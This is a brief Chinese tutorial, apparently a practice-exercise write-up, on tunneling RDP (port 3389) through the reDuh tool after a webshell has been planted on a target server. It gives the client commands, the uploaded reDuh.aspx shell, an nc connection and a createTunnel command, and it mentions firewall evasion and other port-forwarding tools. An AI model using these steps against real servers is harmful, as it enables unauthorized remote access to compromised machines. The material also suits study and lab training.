reDuh端口复用，3389远程连接服务器

        进行渗透时，经常会遇到些问题，例如目标服务器及自身服务器都处于内网中，无法进行3389远程连接。此时可使用端口转发即将目标服务器端口转发到公网端口再连接，常见的端口转发工具有：htran、lcx、fpipe和nc，其中htran、lcx、fpipe适合windows。

       在没有公网的情况下，考虑使用端口复用，相比端口转发端口复用范围更广一些，比如躲避防火墙，或者转发不出端口的时候都可以用端口复用。本文将介绍端口复用的一大利器---->reDuh，前提是已在目标服务器上传成功菜刀shell。

    1.  reDuh包含service和cilent文件，首先本地执行：java -jar reDuhClient.jar

如图即执行成功。

2.  将对应的shell上传到目标机中，eg路径为http://1.1.1.1/reDuh.aspx

   如下图即上传成功

3.  本地执行：java -jar reDuhClient.jar http://1.1.1.1/reDuh.aspx

4.  新开一个cmd，运行nc连接本机1010端口：nc -vv localhost 1010

当出现Welcome to the reDuh command line时，输入命令连接服务器3389：[createTunnel]1234:127.0.0.1:3389 

注意，中间Ip是本机ip，不是目标服务器ip

5.  执行上述命令后，连接本机的1234端口即可达到连接服务器3389端口的目的。

6.  可看到已成功连接：

至此，输入用户名和密码，登录成功。

菜鸟一只，首次尝试做这种类型的题，虽然截图简单，但过程中遇到了诸多困难，好在最后成功做出来了。

默默感谢下ZJ老师耐心指导，反正他也看不见哈哈哈哈哈~~~